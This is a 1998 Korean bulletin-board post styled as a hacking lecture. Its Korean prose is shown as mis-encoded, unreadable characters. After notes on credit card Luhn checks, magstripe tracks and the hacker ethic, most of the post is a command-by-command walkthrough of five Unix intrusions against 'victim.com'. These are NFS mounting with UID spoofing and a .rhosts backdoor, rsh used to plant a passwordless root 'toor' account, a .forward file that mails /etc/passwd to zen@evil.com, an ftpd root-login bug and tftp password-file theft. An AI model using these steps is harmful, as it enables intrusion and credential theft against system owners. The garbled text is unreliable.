¸®´ª½º ±âŸ ÀÚ·á |
---|
Á¦¸ñ | ÇØÅ· °Á #7 1998/06/30 (14:30) |
À̸§ | ±èÈ¿¿ø |
¹øÈ£ | 38 |
Á¶È¸ | 336 |
º»¹® |
³»°¡ ¹Ù¸¥ ½Å¿ëÄ«µå ¹øÈ£¸¦ °¡Áö°í ÀÖ´ÂÁö ¾î¶»°Ô ȹÀÎÇϳª? ½Å¿ëÄ«µå´Â Luhn Check Digit AlgorithmÀ» »ç¿ëÇÑ´Ù. ÀÌ ¾Ë°í¸®ÁòÀº ÁÖ¿ä ¸ñÀûÀº µ¥ÀÌÅÍÀÇ ¿À·ù¸¦ ã´Â °ÍÀÌ´Ù. ±×¸®°í ¾àÇÑ º¸¾È ±â´Éµµ °¡Áö°í ÀÖ´Ù. ¦¼öÀÇ ÀÚ¸®¼ö¸¦ °¡Áö´Â ¹øÈ£ÀÇ Ä«µå¿¡ ´ëÇؼ, Ȧ ¼öÀÎ ÀÚ¸®ÀÇ ¼ýÀÚ¸¦ 2¹è·ÎÇÏ°í 9º¸´Ù Å« ¼ýÀÚÀÇ °æ¿ì 9¸¦ »«´Ù. ¦¼ö ÀÚ¸®¿Í 2¹èÇÑ È¦¼öÀÚ¸® ¼ö¸¦ ´õÇÏ¸é ±× °á°ú°¡ 10ÀÇ ¹è¼ö°¡ µÇ¾î¾ß ÇÑ´Ù. ±×·¸Áö ¾Ê´Ù¸é À߸øµÈ Ä«µåÀÌ´Ù. Ä«µå°¡ Ȧ¼öÀÚ¸®ÀÇ ¹øÈ£¶ó¸é, ¦¼ö ÀÚ¸® ¼ýÀÚ¸¦ 2¹èÇؼ ¶È°°ÀÌ °è»êÇÏ¸é µÈ´Ù. ÀÚ±â¶ìÀÇ µ¥ÀÌÅÍ ¹èÄ¡´Â ¾î¶² °ÍÀΰ¡? Ç¥ÁØ Ä«µå´Â 3°³ÀÇ Æ®·¢¶Ç´Â 3°³ÀÇ Æ®·¢ÀÇ Á¶ÇÕÀÌ ÀÖ´Ù. Æ®·¢ 1Àº óÀ½À¸·Î Ç¥ÁØÈµÈ Æ®·¢ÀÌ´Ù. ±¹Á¦ Ç×°ø ¿î¼ö ¿¬ÇÕ(Internetional Air Transportation Association; IATA)¿¡¼ °³¹ßÇÏ¿´°í ¾ÆÁ÷µµ ±× ¸ñÀûÀ¸·Î »ç¿ëÇϱâ À§ÇØ ¿¹¾àµÇ¾î ÀÖ´Ù. 210bpi·Î 79ÀÚÁ¤µµ°¡ µé¾î°£´Ù. ÁÖ °èÁ¤ ¹øÈ£¿Í(18 ÀÚ¸®±îÁö) À̸§(26ÀÚÀÇ ¿µ¹® ¼ýÀÚ)¸¦ Æ÷ÇÔÇÑ´Ù. Æ®·¢ 2´Â ¹Ì±¹ ÀºÇà°¡ ¿¬ÇÕ(American Bankers Association; ABA)¿¡¼ ¿Â¶óÀÎ Æ®·£Àè¼ÇÀ» À§Çؼ °³¹ßÇß´Ù. 75bpi·Î 40°³ÀÇ ¼ýÀÚ¸¦ ³ÖÀ» ¼ö ÀÖ´Â °ø°£ÀÌ ÀÖ´Ù. ¾ÏÈ£ÈµÈ PIN°ú, ±¹°¡¹øÈ£, ÅëÈ ´ÜÀ§, Çã¿ëµÈ ±Ý¾×, °èÁ¤Á¤µµ¿Í ´Ù¸¥ Á¦ÇÑ »çÇ×ÀÌ µé¾î ÀÖ´Ù. ÀÚ¼¼ÇÑ °ÍÀº ANSI/ISO 7811/1-5 ¸¦ Àб⠹ٶõ´Ù. ÀÌ ¹®¼´Â ¹Ì±¹ ÀºÇà°¡ ¿¬ÇÕ¿¡¼ º¼ ¼ö ÀÖ´Ù. ÇØÅ·ÀÇ À±¸®´Â ¹«¾ùÀΰ¡? Hackers : Heroes of the Computer Revolution, Steven Levy Àú¹ßÃé ÄÄÇ»ÅÍ¿¡ Á¢±ÙÇÏ´Â °Í - ±×¸®°í ¼¼»óÀÌ ¾î¶»°Ô µ¹¾Æ°¡´ÂÁö ¾Ë·ÁÁÙ ¼ö ÀÖ´Â ¾î¶² °Í -Àº ÀüüÀûÀÌ°í ¹«Á¦ÇÑÀ̾î¾ß ÇÑ´Ù. Ç×»ó ½ÇÁ¦ÀûÀÎ ¸í·É¿¡ µû¸¥´Ù. ¸ðµç Á¤º¸´Â ÀÚÀ¯·Î¿Í¾ß ÇÑ´Ù. °ø±Ç·ÂÀ» ºÒ½ÅÇÑ´Ù. Áö¿ªºÐ±ÇÀ» ÁöÇâÇÑ´Ù. ÇØÄ¿´Â ÇØÅ· ´É·ÂÀ¸·Î Æò°¡µÇ¾î¾ßÁö ÇÐÀ§³ª, ³ªÀÌ, ÀÎÁ¾, ÁöÀ§¿Í °°Àº À߸øµÈ ±âÁØÀ¸·Î Æò°¡µÇ¾î¼´Â ¾È µÈ´Ù. ÄÄÇ»ÅÍ¿¡¼ ¹Ì¿Í ¿¹¼úÀ» âÁ¶ÇÒ ¼ö ÀÖ´Ù. ÄÄÇ»ÅÍ´Â ÀλýÀ» ³ª¾ÆÁö°Ô ÇÑ´Ù. º»ÀÎÀº GNUÀ» ¼±¾ðÇÑ´Ù À̱ۿ¡ ´ëÇÑ ¹ýÀû ±Ç¸®´Â º»Àο¡°Ô ¾øÀ½À» ¹àÈù´Ù. ¶ÇÇÑ À̱۷ΠÀÎÇØ ¹ß»ýÇÏ´Â ¸ðµç ¹ýÀû ¹®Á¦¿¡ ´ëÇØ º»ÀÎÀº Ã¥ÀÓÀÌ ¾øÀ½À» ¹àÈù´Ù -------------------------------------------------------------------------------- ¿©±â¼ 'evil %'Àº ³ªÀÇ ½Ã½ºÅÛÀÇ ÇÁ·ÒÇÁÆ®ÀÌ°í, 'victim %'Àº »ó´ëÆí ½Ã½ºÅÛÀÇ ÇÁ·ÒÇÁÆ®ÀÌ´Ù. 'victim.com'Àº »ó´ëÆí ½Ã½ºÅÛÀÇ µµ¸ÞÀÎ ³×ÀÓÀÌ´Ù. 1. ´Ù¸¥ ½Ã½ºÅÛÀÇ ³²ÀÇ µð·ºÅ丮 Á¢±ÙÇϱâ 2. ´Ù¸¥ ½Ã½ºÅÛ¿¡¼ rootµÇ±â 3. FTP¿Í ¸ÞÀÏÀ» ÀÌ¿ëÇÏ¿© »ó´ëÆí È£½ºÆ®ÀÇ passwdÆÄÀÏ °¡Á®¿À±â 4. FTP¿¡¼ root±ÇÇÑÀ» °¡Áö´Â ¿¾³¯ ¹æ¹ý 5. tftp·Î »ó´ë È£½ºÆ®ÀÇ passwdÆÄÀÏ °¡Á®¿À±â -------------------------------------------------------------------------------- 1. ´Ù¸¥ ½Ã½ºÅÛÀÇ ³²ÀÇ µð·ºÅ丮 Á¢±ÙÇϱ⠸ÕÀú showmount·Î »ó´ëÆí ½Ã½ºÅÛÀÇ µð·ºÅ丮Áß °ø°³µÈ µð·ºÅ丮¸¦ ã´Â´Ù. evil % showmount -e victim.com export list for victim.com: /export (everyone) /var (everyone) /usr easy /export/exec/kvm/sun4c.sunos.4.1.3 easy /export/root/easy easy /export/swap/easy easy À§¸¦ º¸¸é °ø°³µÈ µð·ºÅ丮ÀÇ ¿°Å¸¦ º¼ ¼ö ÀÖ´Ù. ¿äÁòÀÇ ½Ã½ºÅÛ¿¡´Â À§¿Í °°ÀÌ °ø°³½ÃÅ°´Â °æ¿ì´Â µå¹°°í, ÀÖ´ÙÇÏ´õ¶óµµ º¸Åë Àº /usrµð·ºÅ丮 Á¤µµÀÌ´Ù. ÇÏÁö¸¸ /usrµð·ºÅ丮¸¸ °ø°³µÇ¾îµµ ¿ì¸®°¡ ÇÒ ¼ö ÀÖ´Â ¸ñÀûÀº ÃæºÐÈ÷ ´Þ¼ºÇÒ ¼ö ÀÖ´Ù. ´ÙÀ½À¸·Î ÇÒ ÀÏÀº ÀÚ±âÀÇ ½Ã½ºÅÛ¿¡ ÀÖ´Â µð·ºÅ丮¿¡ »ó´ëÆíÀÇ °ø°³µÈ µð·ºÅ丮¸¦ ¸¶¿îÆ® ½ÃÅ°´Â ÀÏÀÌ´Ù. ÀÌÁ¦ºÎÅÍ´Â ÃÖ¼ÒÇÑ ·ç Æ®(root)ÀÇ ±ÇÇÑÀÌ ÀÖ¾î¾ßÇÑ´Ù. ·çÆ®°¡ ¾Æ´Ï¸é hackingµµ ¸øÇظԴ´Ù. '#'ÀÇ promptÇ¥½Ã´Â ·çÆ®ÀÇ promptÀÓÀ» ¸ðµÎ ¾Ë°ÍÀÌ´Ù. evil # mount victim.com:/usr /foo evil # cd /foo evil # ls -alg total 3 1 drwxr-xr-x 11 root deamon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jun 19 1991 . . 1 drwx--x--x 9 10001 deamon 1024 Jun 3 15:49 guest ÀÚ ÀÌÁ¦ »ó´ëÆí µð·ºÅ丮¸¦ ¸¶¿îÆ® ½ÃÄ×°í, ±× µð·ºÅ丮¸¦ µé¾î°¡¼ ±× ¾Æ·¡ guest¶ó´Â µð·ºÅ丮°¡ ÀÖ´Â °ÍÀ» º¼ ¼ö ÀÖ´Ù. ÀÌ µð·ºÅ丮´Â 1001ÀÇ UID¸¦ °®´Â »ç¶÷ÀÇ ¼ÒÀ¯ÀÓÀ» ¾Ë ¼ö ÀÖ°í, ±× »ç¶÷ÀÇ °èÁ¤ÀÌ guestÀÌ°í, homeµð·ºÅ丮°¡ ¹Ù·Î ÀÌ guestµð·ºÅä ¸®¶ó´Â °ÍÀ» ÃßÁ¤ÇÒ ¼ö ÀÖ´Ù. ÀÌÁ¦ ¸ñÇ¥°¡ Á¤ÇØÁ³´Ù. ¾ÆÁ÷Àº ÀÌ µð·ºÅ丮ÀÇ Á¢±Ù ±ÇÇÑÀº otherÀÇ ±ÇÇѹۿ¡ ¾øÀ¸¹Ç·Î ±× »ç¶÷ÀÌ g uestµð·ºÅ丮ÀÇ otherÁ¢±Ù ±ÇÇÑÀ» ¸·¾Æ ³õ¾Ò´Ù¸é ¾ÆÁ÷Àº ±× µð·ºÅ丮¿¡ Á¢±Ù ÇÒ ¼ö °¡ ¾ø´Ù. ÀÌÁ¦ ÀÌ µð·ºÅ丮ÀÇ Á¢±Ù ±ÇÇÑÀ» ¾ò ¾îº¸ÀÚ. ¹æ¹ýÀº ¾ÆÁÖ °£´ÜÇÏ´Ù. ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡ °°Àº UID¸¦ °®´Â »ç¶÷ÀÇ °èÁ¤À» Çϳª ¸¸µé¾î ÁÖ°í ³»°¡ ±× »ç¶÷ÀÌ µÇ´Â °Å´Ù ³Ê ¹«³ª ¿ì½À°Ô ½¬¿î ¹æ¹ýÀÌ´Ù. evil # echo guest:x:10001:1:temporary breakin account:/: >>/etc/passwd evil # ls -alg total 3 1 drwxr-xr-x 11 root deamon 512 Jun 19 09:47 . 1 drwxr-xr-x 7 root wheel 512 Jun 19 1991 . . 1 drwx--x--x 9 guest deamon 1024 Jun 3 15:49 guest ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡ °°Àº °èÁ¤À» ¸¸µé¾îÁÖ°í ls¸¦ Çغ¸´Ï ÀÌÁ¦´Â UID°¡ ¼ýÀÚ·Î ³ª¿ÀÁö ¾Ê°í, °èÁ¤À¸·Î ¹Ù²î¾î ³ª¿Â´Ù. ÀÌÁ¦ ¸ðµç Áغñ´Â ³¡³µ´Ù. ³»°¡ ±× »ç¶÷ÀÌ µÇ¾î ±× »ç¶÷ µð·ºÅ丮¸¦ ¸¶À½´ë·Î »ç¿ëÇÒ ¼ö ÀÖ´Ù. ÇÏÁö¸¸ ¿©±â¿¡ ÇϳªÀÇ Å×Å©´ÐÀÌ ´õ ÀÖ´Ù. ±× »ç¶÷ÀÇ homeµð·ºÅ丮¿¡ .rhost¶ó´Â ÆÄÀÏ¿¡ ÀÚ½ÅÀÇ ¼¹öÀ̸§À» Àû¾î ÁÖ¸é ´ÙÀ½ ºÎÅÍ´Â ³ªÀÇ ½Ã½ºÅÛ¿¡¼ ±×»ç¶÷ÀÌ µÈ ´ÙÀ½ ¹Ù·Î ±× ½Ã½ºÅÛÀ¸·Î ·Î±×ÀÎÀ» ÇÒ ¼ö ÀÖ°Ô µÈ´Ù. ¹°·Ð Æнº¿öµå°¡ ÇÊ¿ä¾øÀÌ... ±×·¸´Ù¸é Áö±Ý º¸´Ù´Â ´õ ¸¹Àº ÀϵéÀ» ±×°÷¿¡¼ ÇÒ ¼ö ÀְԵȴÙ. ÀÚ. ÀÌÁ¦ ¸¶Áö¸·ÀÌ´Ù. ¿©±â¼ 'evil.com'Àº ³» ½Ã½ºÅÛÀÇ µµ¸ÞÀÎ ³×ÀÓÀÌ´Ù. evil # su guest evil % echo evil.com >> guest/.rhosts evil % rlogin victim.com Welcome to victim.com!! victim % ¸¸¾à¿¡ °ø°³µÈ µð·ºÅ丮°¡ /bin°ú °°ÀÌ ½ÇÇà ÆÄÀÏÀÌ ÀÖ´Â µð·ºÅ丮¶ó¸é ´ç½ÅÀº ±×°÷¿¡ Æ®·ÎÀÌ ¸ñ¸¶¸¦ ÀúÀå½ÃÄÑ ´Ù¸¥ »ç¶÷À¸·Î ÇÏ¿©±Ý ½ÇÇà½Ãų ¼ö µµ ÀÖÀ» °ÍÀÌ´Ù. ÇÏÁö¸¸ ÀÌ ¹æ¹ýÀº ´ç½ÅÀÌ ±× ½Ã½ºÅÛ¿¡¼ rootÀÇ ±ÇÇÑÀ» °¡ÁöÁö ¸øÇϱ⠶§¹®¿¡ ´ç½ÅÀÌ ±×°÷¿¡ Á¢¼ÓÇÑ ±â·Ï ÆÄÀÏÀ» Áö¿ï ¼ö ¾ø´Ù . ±× ÂÊ¿¡¼ ¸¶À½¸¸ ¸ÔÀ¸¸é ´ç½ÅÀÇ °æ·Î¸¦ ÃßÀûÇÒ ¼öµµ ÀÖ´Ù. ºÎµð ´Ù¸¥ ½Ã½ºÅÛ¿¡ ÇØ°¡ µÇ´Â Àå³Àº ÇÏÁö ¸»°í °¡º¿î ½ÇÇè¿¡¼ ³¡³ª±â¸¦ ¹Ù¶õ´Ù. ÀÌ»ó. -------------------------------------------------------------------------------- 2. ´Ù¸¥ ½Ã½ºÅÛ¿¡¼ rootµÇ±â ÀÌ ¹æ¹ýÀÌ ÅëÇÏ´Â ½Ã½ºÅÛÀº ¿äÁòÀº °ÅÀÇ ¾ø´Ù. ÇÏÁö¸¸ °£È¤ ºÎ½ÇÇÑ ¿¾ ÄÄÇ»ÅÍ¿¡´Â ÅëÇÒ Áöµµ ¸ð¸£´Ï ÇÑ ¹øÂë µµÀüÇØ ºÁµµ ÁÁ´Ù . ¼º°øÇÑ´Ù¸é ´ç½ÅÀº ±× ½Ã½ºÅÛÀÇ ÃÖ°í ±Ç·ÂÀÚ°¡ µÈ´Ù. ÀÌ ¹æ¹ýÀº /etc/hosts.equiv¿¡ "+"ÀÇ ¿ÍÀϵå Ä«µå¸¦ °¡Áö°Å³ª ¾à°£ÀÇ ¹ö±×·Î ÀÎÇØ °¡´ÉÇØÁö´Âµ¥, ÇѸ¶µð·Î ·çÆ®°¡ ¾Æ ´Ñ »ç¶÷ÀÌ »ó´ëÆí È£½ºÆ®·Î Æнº¿öµå ¾øÀÌ ·Î±×ÀÎ Çؼ ±×°÷ÀÇ /etc/passwdÆÄÀÏÀ» ¼öÁ¤ÇÏ´Â °ÍÀÌ´Ù. ÀÌ ¹æ¹ýÀ» ½á¸Ô±â À§Çؼ´Â ¹°·Ð ´ç½ÅÀÌ ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡¼ ·çÆ®À̾î¾ßÇÑ´Ù. ¸ÕÀú ´ç½ÅÀº ´ç½Å ½Ã½ºÅÛ¿¡¼ binÀÌ µÈ´Ù. ±×¸®°í »ó´ëÆí È£½ºÆ®¿¡ ¸ÚÁö°Ô ·Î±×ÀÎ ÇÑ´ÙÀ½¿¡ ±×°÷ÀÇ Æнº¿öµå ÆÄÀÏ¿¡ ·çÆ®¿Í °°Àº UID¸¦ °¡Áö´Â ÀÚ½ÅÀÇ °èÁ¤À» Ãß°¡ ½ÃŲ ÈÄ À¯À¯È÷ ºüÁ®³ª¿Â´Ù. evil % whoami bin evil % rsh victim.com csh -i Warning: no access to tty; thus no job control in this shell... victim % ÀÌÁ¦ ´ç½ÅÀº »ó´ëÆí ½Ã½ºÅÛÀ¸·Î µé¾î¿Ô´Ù. ¸¹Àº ÀÏÀ» ÇÒ ¼ö´Â ¾øÁö¸¸, ´ç½ÅÀÌ ÇÊ¿ä·Î ÇÏ´Â ÀÏÀº ÃæºÐÈ÷ °¡´ÉÇÏ´Ù. ÀÌÁ¦ /etcµð ·ºÅ丮¿¡ ÀÖ´Â passwdÆÄÀÏ¿¡ ÀÚ½ÅÀÇ °èÁ¤À» ½á ³Ö´Â´Ù. more³ª vi µîÀÇ ¸í·ÉÀº ÅëÇÏÁö ¾ÊÀ¸´Ï ¾Æ·¡ÀÇ ¹æ¹ýÀ» ±ÇÀåÇÑ´Ù. victim % cd /etc victim % mv passwd pw.old victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd victim % ^D evil % ÀÌÁ¦ ¸ðµç °ÍÀÌ ³¡³µ´Ù. ´ç½ÅÀÇ ¸·°ÇÑ ·çÆ®±ÇÇÑÀ» °¡Áø °èÁ¤À¸·Î Á¢¼ÓÀ» Çغ¸¾Æ¶ó. evil % rlogin victim.com -l toor Welcome to victim.com! victim # À§ÀÇ ¹æ¹ýÀº ½Ã½ºÅÛÀÇ ±â·Ï ÆÄÀϵéÀÎ wtmp³ª utmp¿¡ ±â·ÏÀ» ³²±âÁö ¾Ê°í, finger³ª whoµîÀ¸·Îµµ ¾Ë¾Æ³¾ ¼ö°¡ ¾ø±â ¶§¹®¿¡ ²Ï ¾µ ¸¸ÇÑ ¹æ¹ýÀÌ´Ù. ÇÏÁö¸¸, ÀÌ ¹æ¹ý¿¡ ÀÇÇØ Á¢±ÙµÉ¸¸ÇÑ ½Ã½ºÅÛÀÌ ÇöÀç´Â ¸¹Áö ¾Ê´Ù. ÀÌ remote shellÀº Å͹̳ΠÀÇÁ¸ÀûÀÌÁö ¾Ê±â ¶§¹®¿¡ ¾Õ¿¡ ¸»ÇßµíÀÌ vi³ª more°°Àº ½ºÅ©¸°¿¡ ±â¹ÝÇÑ ÇÁ·Î±×·¥Àº µ¿ÀÛÇÏÁö ¾Ê´Â´Ù. COPS¶ó´Â ÀÚü º¸¾È ÇÁ·Î±×·¥Àº ÀÌ·¯ÇÑ ÇØÅ·¿¡ µå·¯³ Ãë¾àÁ¡À» ¹ß°ßÇØÁÖ´Ï °ü¸®ÀÚ´Â ÇÑ ¹øÂë »ç¿ëÇØ º¸±â¸¦ ±ÇÇÑ´Ù. tcp wrapper°°Àº ÇÁ·Î±×·¥µµ ÀÌ·¯ÇÑ ·Î±×ÀÎÀ» ¹ß°ßÇÒ ¼ö ÀÖÀ¸´Ï °ü½ÉÀÖ´Â »ç¶÷Àº »ç¿ëÇØ º¸¼¼¿ä. -------------------------------------------------------------------------------- 3. FTP¿Í ¸ÞÀÏÀ» ÀÌ¿ëÇÏ¿© »ó´ëÆí È£½ºÆ®ÀÇ passwdÆÄÀÏ °¡Á®¿À±â À̹æ¹ýÀº ¸ÕÀú anonymous¼ºñ½º¸¦ ÇØÁÖ´Â ftp¼¹ö¿¡¼ ftpÀÇ home µð·ºÅ丮°¡ ¿äÁòó·³ ~ftp/ °°ÀÌ µû·Î ÀÖÁö ¾Ê°í rootµð·ºÅä ¸®¿¡ ÀÖÀ» °æ¿ì¿Í ±× µð·ºÅ丮¿¡ ÆÄÀÏÀ» ¿Ã·Á³õÀ» ¼ö ÀÖ°Ô µÈ ½Ã½ºÅÛ¿¡¼¸¸ °¡´ÉÇÏ´Ù. ¿©±â¼´Â mail¿¡¼ »ç¿ëµÇ´Â .forwardÆÄÀÏÀ» »ç¿ëÇÑ´Ù. .forward´Â ¾î¶°ÇÑ °èÁ¤ÀÇ homeµð·ºÅ丮¿¡ ÀÖÀ¸¸é¼ ±× °èÁ¤À¸·Î ¿Â mailÀ» ´Ù¸¥ °÷À¸·Î º¸³»Áִ°Ϳ¡ ´ëÇÑ Á¤º¸°¡ ±â·ÏµÈ´Ù. ´ç½ÅÀº ¸ÕÀú ftp¿¡ Á¢¼ÓÀ» ÇÑ´Ù. ±×·¯¸é ·Î±×ÀÎ µÈ µð·ºÅ丮´Â ±×°÷ÀÇ rootµð·ºÅ丮ÀÏ °ÍÀÌ°í, ±×°÷ÀÇ /etc¿¡´Â passwdÆÄÀÏÀÌ ÀÖÀ» °ÍÀÌ´Ù. ÀÌ°ÍÀ» °¡Á®¿À´Â °ÍÀÌ´Ù. ±×°÷ ftpÀÇ homeµð·ºÅ丮, Áï rootµð·ºÅ丮¿¡´Ù ´ç½ÅÀÌ ±×°÷¿¡ Á¢¼ÓÇϱâÀü¿¡ ¹Ì¸® ¸¸µé¾î ³õÀº ÆÄÀÏÀ» .forward¶ó´Â À̸§À¸·Î ¿Ã·Á³õ´Â´Ù. ±×·¯¸é ÀÌÁ¦ passwdÆÄÀÏÀ» °¡Á®¿À±â À§ÇÑ Áغñ°¡ ³¡³´Ù. ¿©±â¼ zenÀº ÀÚ½ÅÀÇ È£½ºÆ®¿¡ ÀÖ´Â ÀÚ½ÅÀÇ °èÁ¤ÀÌ´Ù. °¡Àå ¸ÕÀú .forward·Î ¿Ã·ÁÁö°Ô µÉ ÆÄÀÏÀ» ÀÛ¼ºÇÑ´Ù. evil % cat forward_suck_file "|/bin/mail zen@evil.com < /etc/passwd" ÀÌÁ¦ ftp¼¹ö¿¡ Á¢¼ÓÇؼ ÀÌ ÆÄÀÏÀ» .forward¶ó´Â À̸§À¸·Î ftpÀÇ homeµð·ºÅ丮¿¡ ¿Ã·Á³õ´Â´Ù. evil % ftp victim.com Connected to victim.com 220 victim FTP server ready. Name (victim.com:zen) : ftp 331 Guest login ok, send ident as password. password: 230 Guest login ok, access restrictions apply. ftp> ls -lga 200 PORT command successful. 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 byte). total 5 drwxr-xr-x 4 101 1 512 Jun 20 1991 . drwxr-xr-x 4 101 1 512 Jun 20 1991 . . drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete. 242 byte received in 0.066 seconds (3.6 Kbyte/s) ftp> put forward_sucker_file .forward 43 byte sent in 0.0015 seconds (28 Kbyte/s) ftp> quit evil % ÀÚ ÀÌÁ¦ ±×°÷ÀÇ ftp¿¡°Ô ÆíÁö¸¦ º¸³»º¸ÀÚ ´ç½ÅÀÌ ¿Ã·Á³õÀº .forwardÆÄÀÏ¿¡ ÀÇÇØ ±×°÷ÀÇ passwdÆÄÀÏÀÌ ´ç½Å¿¡°Ô mail·Î Àü´ÞµÉ °ÍÀÌ´Ù. evil % echo test | mail ftp@victim.com COPS¶ó´Â ÀÚü º¸¾È ÇÁ·Î±×·¥Àº ´ç½ÅÀÇ ½Ã½ºÅÛ¿¡ ÀÌ·¯ÇÑ FTPÀÇ ±¸¸ÛÀÌ ÀÖ´ÂÁö¸¦ Á¡°ËÇØÁØ´Ù. ÀÌ·¯ÇÑ Ãë¾àÁ¡Àº 100% °ü¸®ÀÚÀÇ ¼ÒȦÀÌ´Ù. ftpÀÇ homeµð·ºÅ丮¸¦ µû·Î ~ftp/¿¡ ¸¸µé¾î ÁÖµçÁö °¢ µð·ºÅ丮¿Í ÆÄÀÏÀÇ Á¢±Ù ±ÇÇÑÀ» ÀûÀýÈ÷ ÁöÁ¤ÇØ Áشٸé Àý´ë ÀϾÁö ¾ÊÀ» hacking¹æ¹ýÀÌ´Ù. -------------------------------------------------------------------------------- 4. FTP¿¡¼ root±ÇÇÑÀ» °¡Áö´Â ¿¾³¯ ¹æ¹ý ÀÌ ¹æ¹ýÀº ftp¿¡¼ rootÀÇ ±ÇÇÑÀ» ȹµæÇÏ´Â ¿À·¡ÀüÀÇ ¹æ¹ýÀÌ´Ù. ¹°·Ð ´ç½ÅÀÇ ½Ã½ºÅÛÀÌ ¾ÆÁ÷µµ ÀÌ·± bug¸¦ °¡Áø ftpd·Î ±¸µ¿µÇ°í ÀÖ´Ù¸é ftpd¸¦ ºü¸¥ ½ÃÀϳ»¿¡ ¾÷±×·¹ÀÌµå ½ÃÄÑ¾ß ÇÒ °ÍÀÌ´Ù. ÇØÅ· ¹æ¹ýÀº °£´ÜÇÏ´Ù. ¾Æ·¡¿Í °°ÀÌ ¸îÁÙÀÇ °£´ÜÇÑ ¸í·ÉÀ¸·Î ³¡À̳´Ù . evil % ftp -n ftp> open victim.com connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp 331 Guest login ok, send ident as password. ftp> quote cwd ~root 530 Please login with USER and PASS. ftp> quote pass ftp 230 Guest login ok, access restriction apply. ftp> ls -al / (or whatever) ¸¸¾à¿¡ À§ÀÇ ¹æ¹ýÀÌ ¼º°øµÇ¾ú´Ù¸é, ´ç½ÅÀº ftp¿¡ rootÀÇ ±ÇÇÑÀ¸·Î loginµÈ °ÍÀÌ´Ù. ´ç½ÅÀº ftpÀÇ ¸ðµç ±â´ÉÀ» È°¿ëÇØ passwdÆÄ ÀÏÀ» ¹Ù²Ù°Å³ª ´ç½ÅÀÌ ¿øÇÏ´Â ¸ðµçÀÏÀ» ÇÒ ¼ö ÀÖ´Ù. ÀÌÁ¦´Â ÀÌ·± ¹ö±×¸¦ °¡Áø ½Ã½ºÅÛÀÌ ¾ø°ÚÁö¸¸ ¾ÆÁ÷µµ ÀÖ´Ù¸é ºÎµð °¢¼º¹Ù¶õ´Ù. -------------------------------------------------------------------------------- 5. tftp·Î »ó´ë È£½ºÆ®ÀÇ passwdÆÄÀÏ °¡Á®¿À±â ftp¿Í ºñ½ÁÇÑ ÇÁ·Î±×·¥À¸·Î tft³ª ±âŸ ±âº»ÀûÀÎ ±â´ÉÀ» °¡Áø ÆÄÀÏÀü¼Û ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù. ÀÌ µ¥¸óÀº È®ÀÎÀ» À§ÇØ ºñ¹Ð¹øÈ£¸¦ ¿ä±¸ÇÏÁö ¾Ê´Â´Ù. ¸¸¾à¿¡ ±× ½Ã½ºÅÛ¿¡¼ Ưº°È÷ Á¢±Ù±ÇÇÑÀ» Á¦ÇÑÇÏÁö ¾Ê¾Ò´Ù¸é ´ç½ÅÀº ±× ½Ã½ºÅÛ¿¡ Àаųª ¾²±â¸¦ ¸¶À½´ë·Î ÇÒ ¼ö ÀÖ´Ù. ¾Æ·¡¿Í °°ÀÌ ÇÏ¸é °£´ÜÈ÷ ÀÚ½ÅÀÇ /tmp µð·ºÅ丮·Î »ó´ë È£½ºÆ®ÀÇ /etc/passwd ÆÄÀÏÀ» °¡Á®¿Ã ¼ö ÀÖ´Ù. evil % tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit À§¿¡¼¿Í °°Àº µµµÏÁúÀ» ¸·±â À§Çؼ´Â ¿ª½Ã °£´ÜÇÏ´Ù. tftp°°Àº ÇÁ·Î±×·¥À» »ç¿ëÇÏÁö ¸øÇÏ°Ô ÇÏ¸é µÈ´Ù. tftp°¡ ²À ÇÊ¿äÇÏ´Ù¸é , ¾ÈÀüÀ» À§ÇØ Ç÷¡±×³ª ¿É¼Ç µîÀ» ÀûÀýÈ÷ »ç¿ëÇÏ¿© Á¢±Ù ±ÇÇÑÀ» Á¦ÇÑÇϰųª, chroot wrapper ÇÁ·Î±×·¥ÀÇ °ü¸® ¾Æ·¡¿¡ µÎ¸é µÈ´Ù . -------------------------------------------------------------------------------- |